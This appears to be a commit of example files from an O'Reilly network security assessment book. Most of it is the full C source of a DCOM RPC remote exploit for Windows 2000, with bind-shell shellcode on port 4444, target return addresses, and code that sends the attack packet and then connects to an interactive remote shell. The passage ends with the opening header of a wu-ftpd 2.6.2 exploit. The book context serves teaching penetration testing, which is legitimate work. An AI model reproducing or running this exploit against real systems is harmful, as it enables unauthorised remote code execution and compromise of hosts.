Commit de738fbe authored by O'Reilly Media, Inc.'s avatar O'Reilly Media, Inc.
Browse files

Initial commit

parents
## Example files for the title:
# Network Security Assessment 2nd Edition, by Chris McNab
[![Network Security Assessment 2nd Edition, by Chris McNab](http://akamaicovers.oreilly.com/images/9780596510305/cat.gif)](https://www.safaribooksonline.com/library/view/title/9780596510305//)
The following applies to example files from material published by O’Reilly Media, Inc. Content from other publishers may include different rules of usage. Please refer to any additional usage rights explained in the actual example files or refer to the publisher’s website.
O'Reilly books are here to help you get your job done. In general, you may use the code in O'Reilly books in your programs and documentation. You do not need to contact us for permission unless you're reproducing a significant portion of the code. For example, writing a program that uses several chunks of code from our books does not require permission. Answering a question by citing our books and quoting example code does not require permission. On the other hand, selling or distributing a CD-ROM of examples from O'Reilly books does require permission. Incorporating a significant amount of example code from our books into your product's documentation does require permission.
We appreciate, but do not require, attribution. An attribution usually includes the title, author, publisher, and ISBN.
If you think your use of code examples falls outside fair use or the permission given here, feel free to contact us at <permissions@oreilly.com>.
Please note that the examples are not production code and have not been carefully testing. They are provided "as-is" and come with no warranty of any kind.
logo.png

5.05 KB

/*
**
** 2003/07/27 - DCOM RPC WIN32 remote exploit (Most languages)
**
** FlashSky/Benjurry and, H D Moore's code is very excellent.
** It works well even if change only return address.
** I didn't feel necessity for new make.
**
** Thankful to them.
**
** 2003/07/30 - Update, Added magic return address.
**
** kokanin supplied very excellent information:
** URL: http://lists.netsys.com/pipermail/full-disclosure/2003-July/012000.html
**
** * As well as Korean thanks to, a lot of systems can exploit.
**
** --
** Thank you.
**
** P.S: Sorry, for my poor english.
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.i21c.net & http://x82.inetcop.org
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
u_char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,
0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,
0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,
0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00
};
u_char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,
0xE8,0x03,0x00,0x00,0xE5,0x00,0x00,0x00,
0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,
0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,
0xCC,0x45,0x64,0x49,0xB0,0x70,0xDD,0xAE,
0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,
0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,
0x7C,0x5E,0x0D,0x00,0x00,0x00,0x00,0x00,
0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,
0x2A,0x4D,0xCE,0x11,0xA6,0x6A,0x00,0x20,
0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,
0x4D,0x41,0x52,0x42,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
0x00,0x00,0x00,0x00,0xA8,0xF4,0x0B,0x00,
0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,
0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,
0x28,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0xC8,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,
0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,
0x64,0x29,0xCD,0x00,0x00,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,
0x60,0x00,0x00,0x00,0x58,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,
0x20,0x00,0x00,0x00,0x78,0x00,0x00,0x00,
0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,
0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,
0x06,0x09,0x02,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x78,0x19,0x0C,0x00,
0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,
0x01,0x00,0x00,0x00,0x70,0xD8,0x98,0x93,
0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,
0xB2,0x00,0x00,0x00,0x32,0x00,0x31,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x80,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,
0x60,0x00,0x00,0x00,0x60,0x00,0x00,0x00,
0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x3B,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,
0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,
0x80,0x0E,0xE9,0x4A,0x99,0x99,0xF1,0x8A,
0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x30,0x00,0x00,0x00,0x78,0x00,0x6E,0x00,
0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
0x46,0x00,0x58,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x10,0x00,0x00,0x00,0x30,0x00,0x2E,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x68,0x00,0x00,0x00,0x0E,0x00,0xFF,0xFF,
0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
u_char request2[]=
{
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x20,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00
};
u_char request3[]=
{
0x5C,0x00,0x43,0x00,0x24,0x00,0x5C,0x00,
0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,
0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x2E,0x00,0x64,0x00,0x6F,0x00,
0x63,0x00,0x00,0x00
};
u_char request4[]=
{
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,
0x00,0x00,0x00,0x00,0x88,0x2A,0x0C,0x00,
0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x28,0x8C,0x0C,0x00,0x01,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
u_char shellcode[]=
{
/* port 4444 bind shellcode */
0x46,0x00,0x58,0x00,0x4e,0x00,0x42,0x00,
0x46,0x00,0x58,0x00,0x46,0x00,0x58,0x00,
0x4e,0x00,0x42,0x00,0x46,0x00,0x58,0x00,
0x46,0x00,0x58,0x00,0x46,0x00,0x58,0x00,
0x46,0x00,0x58,0x00,0xff,0xff,0xff,0xff,
0xcc,0xe0,0xfd,0x7f,0xcc,0xe0,0xfd,0x7f,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xeb,
0x19,0x5e,0x31,0xc9,0x81,0xe9,0x89,0xff,
0xff,0xff,0x81,0x36,0x80,0xbf,0x32,0x94,
0x81,0xee,0xfc,0xff,0xff,0xff,0xe2,0xf2,
0xeb,0x05,0xe8,0xe2,0xff,0xff,0xff,0x03,
0x53,0x06,0x1f,0x74,0x57,0x75,0x95,0x80,
0xbf,0xbb,0x92,0x7f,0x89,0x5a,0x1a,0xce,
0xb1,0xde,0x7c,0xe1,0xbe,0x32,0x94,0x09,
0xf9,0x3a,0x6b,0xb6,0xd7,0x9f,0x4d,0x85,
0x71,0xda,0xc6,0x81,0xbf,0x32,0x1d,0xc6,
0xb3,0x5a,0xf8,0xec,0xbf,0x32,0xfc,0xb3,
0x8d,0x1c,0xf0,0xe8,0xc8,0x41,0xa6,0xdf,
0xeb,0xcd,0xc2,0x88,0x36,0x74,0x90,0x7f,
0x89,0x5a,0xe6,0x7e,0x0c,0x24,0x7c,0xad,
0xbe,0x32,0x94,0x09,0xf9,0x22,0x6b,0xb6,
0xd7,0x4c,0x4c,0x62,0xcc,0xda,0x8a,0x81,
0xbf,0x32,0x1d,0xc6,0xab,0xcd,0xe2,0x84,
0xd7,0xf9,0x79,0x7c,0x84,0xda,0x9a,0x81,
0xbf,0x32,0x1d,0xc6,0xa7,0xcd,0xe2,0x84,
0xd7,0xeb,0x9d,0x75,0x12,0xda,0x6a,0x80,
0xbf,0x32,0x1d,0xc6,0xa3,0xcd,0xe2,0x84,
0xd7,0x96,0x8e,0xf0,0x78,0xda,0x7a,0x80,
0xbf,0x32,0x1d,0xc6,0x9f,0xcd,0xe2,0x84,
0xd7,0x96,0x39,0xae,0x56,0xda,0x4a,0x80,
0xbf,0x32,0x1d,0xc6,0x9b,0xcd,0xe2,0x84,
0xd7,0xd7,0xdd,0x06,0xf6,0xda,0x5a,0x80,
0xbf,0x32,0x1d,0xc6,0x97,0xcd,0xe2,0x84,
0xd7,0xd5,0xed,0x46,0xc6,0xda,0x2a,0x80,
0xbf,0x32,0x1d,0xc6,0x93,0x01,0x6b,0x01,
0x53,0xa2,0x95,0x80,0xbf,0x66,0xfc,0x81,
0xbe,0x32,0x94,0x7f,0xe9,0x2a,0xc4,0xd0,
0xef,0x62,0xd4,0xd0,0xff,0x62,0x6b,0xd6,
0xa3,0xb9,0x4c,0xd7,0xe8,0x5a,0x96,0x80,
0xae,0x6e,0x1f,0x4c,0xd5,0x24,0xc5,0xd3,
0x40,0x64,0xb4,0xd7,0xec,0xcd,0xc2,0xa4,
0xe8,0x63,0xc7,0x7f,0xe9,0x1a,0x1f,0x50,
0xd7,0x57,0xec,0xe5,0xbf,0x5a,0xf7,0xed,
0xdb,0x1c,0x1d,0xe6,0x8f,0xb1,0x78,0xd4,
0x32,0x0e,0xb0,0xb3,0x7f,0x01,0x5d,0x03,
0x7e,0x27,0x3f,0x62,0x42,0xf4,0xd0,0xa4,
0xaf,0x76,0x6a,0xc4,0x9b,0x0f,0x1d,0xd4,
0x9b,0x7a,0x1d,0xd4,0x9b,0x7e,0x1d,0xd4,
0x9b,0x62,0x19,0xc4,0x9b,0x22,0xc0,0xd0,
0xee,0x63,0xc5,0xea,0xbe,0x63,0xc5,0x7f,
0xc9,0x02,0xc5,0x7f,0xe9,0x22,0x1f,0x4c,
0xd5,0xcd,0x6b,0xb1,0x40,0x64,0x98,0x0b,
0x77,0x65,0x6b,0xd6,0x93,0xcd,0xc2,0x94,
0xea,0x64,0xf0,0x21,0x8f,0x32,0x94,0x80,
0x3a,0xf2,0xec,0x8c,0x34,0x72,0x98,0x0b,
0xcf,0x2e,0x39,0x0b,0xd7,0x3a,0x7f,0x89,
0x34,0x72,0xa0,0x0b,0x17,0x8a,0x94,0x80,
0xbf,0xb9,0x51,0xde,0xe2,0xf0,0x90,0x80,
0xec,0x67,0xc2,0xd7,0x34,0x5e,0xb0,0x98,
0x34,0x77,0xa8,0x0b,0xeb,0x37,0xec,0x83,
0x6a,0xb9,0xde,0x98,0x34,0x68,0xb4,0x83,
0x62,0xd1,0xa6,0xc9,0x34,0x06,0x1f,0x83,
0x4a,0x01,0x6b,0x7c,0x8c,0xf2,0x38,0xba,
0x7b,0x46,0x93,0x41,0x70,0x3f,0x97,0x78,
0x54,0xc0,0xaf,0xfc,0x9b,0x26,0xe1,0x61,
0x34,0x68,0xb0,0x83,0x62,0x54,0x1f,0x8c,
0xf4,0xb9,0xce,0x9c,0xbc,0xef,0x1f,0x84,
0x34,0x31,0x51,0x6b,0xbd,0x01,0x54,0x0b,
0x6a,0x6d,0xca,0xdd,0xe4,0xf0,0x90,0x80,
0x2f,0xa2,0x04,0x00
};
struct os_plat_pk
{
int op_pk_num;
char *op_pk_str;
u_long retloc_jmp_esp;
};
struct os_plat_pk __pt_pkg_form[]=
{
{0,"Windows 2000 magic version 1",0x0018759F},
{1,"Windows 2000 magic version 2",0x001875E3},
{2,"Windows 2000 magic version 3",0x001F0CD0},
{3,"Windows 2000 magic version 4",0x010016C6},
{4,"Windows 2000 magic version 5",0x010016CB},
{0x82,NULL,0}
};
#define DEF_STR "It's test"
#define DEF_BF (0x1000)
#define DEF_SZ (0xff)
#define GET_SZ (0x400)
int sexsock(char *conn_host_nm,int conn_port_nm);
void start_shell(int st_sock_va);
void re_connt_lm(int st_sock_va);
void pri_usg(char *f_nm);
void pri_banrl();
int main(int argc, char *argv[])
{
int sock,type_def=(0),r_r1,r_r2,whgl;
u_long retloc_jmp_esp=(__pt_pkg_form[type_def].retloc_jmp_esp);
u_char get_bf[(DEF_BF)],atk_bf[(DEF_BF)];
char def_host[(DEF_SZ)]=(DEF_STR);
(void)pri_banrl();
while((whgl=getopt(argc,argv,"T:t:H:h:Ii"))!=EOF)
{
switch(whgl)
{
case 'T':
case 't':
if((type_def=atoi(optarg))>4)
{
(void)pri_usg(argv[0]);
}
else retloc_jmp_esp=(__pt_pkg_form[type_def].retloc_jmp_esp);
break;
case 'H':
case 'h':
memset((char *)def_host,0,sizeof(def_host));
strncpy(def_host,optarg,sizeof(def_host)-1);
break;
case 'I':
case 'i':
(void)pri_usg(argv[0]);
break;
case '?':
(void)pri_usg(argv[0]);
break;
}
}
if(strstr(def_host,(DEF_STR)))
{
(void)pri_usg(argv[0]);
}
fprintf(stdout," [*] Target: %s.\n",__pt_pkg_form[type_def].op_pk_str);
fprintf(stdout," [0] Add return address.\n");
memcpy((u_char *)shellcode+36,(u_char *)&retloc_jmp_esp,4);
fprintf(stdout," [1] Start, shellcode setting.\n");
memcpy((u_char *)atk_bf,request1,sizeof(request1));
r_r1=sizeof(request1);
r_r2=sizeof(shellcode)/2;
#define QIK_SHIFT(v,x,l) *(u_long *)(v+x)=*(u_long *)(v+x)+l
QIK_SHIFT(request2,0,r_r2);
QIK_SHIFT(request2,8,r_r2);
memcpy((u_char *)atk_bf+r_r1,request2,sizeof(request2));
r_r1+=sizeof(request2);
memcpy((u_char *)atk_bf+r_r1,shellcode,sizeof(shellcode));
r_r1+=sizeof(shellcode);
memcpy((u_char *)atk_bf+r_r1,request3,sizeof(request3));
r_r1+=sizeof(request3);
memcpy((u_char *)atk_bf+r_r1,request4,sizeof(request4));
r_r1+=sizeof(request4);
r_r2=sizeof(shellcode)-12;
QIK_SHIFT(atk_bf,8,r_r2);
QIK_SHIFT(atk_bf,16,r_r2);
QIK_SHIFT(atk_bf,128,r_r2);
QIK_SHIFT(atk_bf,132,r_r2);
QIK_SHIFT(atk_bf,180,r_r2);
QIK_SHIFT(atk_bf,184,r_r2);
QIK_SHIFT(atk_bf,208,r_r2);
QIK_SHIFT(atk_bf,396,r_r2);
fprintf(stdout," [2] Trying %s:135 ...\n",def_host);
sock=(int)sexsock(def_host,(135));
(void)re_connt_lm(sock);
fprintf(stdout," [3] Connected to %s:135.\n",def_host);
send(sock,bindstr,sizeof(bindstr),0);
recv(sock,get_bf,sizeof(get_bf),0);
fprintf(stdout," [4] Send, attack code.\n");
send(sock,atk_bf,r_r1,0);
close(sock);
fprintf(stdout," [5] OK, Trying %s:4444 ...\n",def_host);
fprintf(stdout," [*] Waiting, cmd shell ");
fflush(stdout);
sleep(1);
fprintf(stdout,".");
fflush(stdout);
sleep(1);
fprintf(stdout,".");
fflush(stdout);
sleep(1);
fprintf(stdout,".\n");
sock=(int)sexsock(def_host,(4444));
(void)re_connt_lm(sock);
(void)start_shell(sock);
exit(0);
}
int sexsock(char *conn_host_nm,int conn_port_nm)
{
int sock;
struct hostent *sxp;
struct sockaddr_in sxp_addr;
if((sxp=gethostbyname(conn_host_nm))==NULL)
{
herror(" [-] gethostbyname() error");
return(-1);
}
if((sock=socket(AF_INET,SOCK_STREAM,0))==-1)
{
perror(" [-] socket() error");
return(-1);
}
sxp_addr.sin_family=AF_INET;
sxp_addr.sin_port=htons(conn_port_nm);
sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
bzero(&(sxp_addr.sin_zero),8);
if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==-1)
{
perror(" [-] connect() error");
return(-1);
}
return(sock);
}
void start_shell(int st_sock_va)
{
int died;
char *command="cd C:\\ & echo Wow, are u hacker now ?!\n";
char readbuf[(GET_SZ)];
fd_set rset;
memset((char *)readbuf,0,sizeof(readbuf));
fprintf(stdout," [!] Executed shell successfully !\n\n");
send(st_sock_va,command,strlen(command),0);
for(;;)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(st_sock_va,&rset);
FD_SET(STDIN_FILENO,&rset);
select(st_sock_va+1,&rset,NULL,NULL,NULL);
if(FD_ISSET(st_sock_va,&rset))
{
died=read(st_sock_va,readbuf,sizeof(readbuf)-1);
if(died<=0)
exit(0);
readbuf[died]=0;
fprintf(stdout,"%s",readbuf);
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
if(died>0)
{
readbuf[died]=0;
write(st_sock_va,readbuf,died);
}
}
}
return;
}
void re_connt_lm(int st_sock_va)
{
if(st_sock_va==-1)
{
fprintf(stdout," [-] Failed.\n\n");
fprintf(stdout," Happy Exploit ! :-)\n\n");
exit(-1);
}
}
void pri_usg(char *f_nm)
{
int r_rn=0;
fprintf(stdout," Usage: %s -option [argument]\n\n",f_nm);
fprintf(stdout,"\t -h [hostname] - target host.\n");
fprintf(stdout,"\t -t [number] - select target number.\n\n");
fprintf(stdout," Select target number>\n\n");
for(;;)
{
if(__pt_pkg_form[r_rn].op_pk_num==(0x82))
break;
else
{
fprintf(stdout,"\t {%d} %s\n",__pt_pkg_form[r_rn].op_pk_num,__pt_pkg_form[r_rn].op_pk_str);
}
r_rn++;
}
fprintf(stdout,"\n Exmaple> %s -h korea.microsoft.com -t3\n\n",f_nm);
exit(0);
}
void pri_banrl()
{
fprintf(stdout,"\n DCOM RPC WIN32 remote exploit (Most languages)\n\n");
}
/* eox */
/*
**
** wu-ftpd v2.6.2 off-by-one remote 0day exploit.
** Public version - 2003/08/02
**
** --
** This vulnerability was discovered by Wojciech Purczynski <cliph@isec.pl>,
** Janusz Niewiadomski <funkysh@isec.pl>.
** They offered excellent Advisory, I'm thankful to them.
**
** URL: http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.inetcop.org
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** More useful version isn't going to share. (various test version)
** For reference, exploit method that use `STOR' command succeeded. :-)
**
** Update: August 2, I added wu-ftpd-2.6.2, 2.6.0, 2.6.1 finally.
** August 3, Brute-Force function addition.
** --
** Thank you.
**
*/
#define VERSION "v0.0.3"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define DEBUG_NG
#undef DEBUG_NG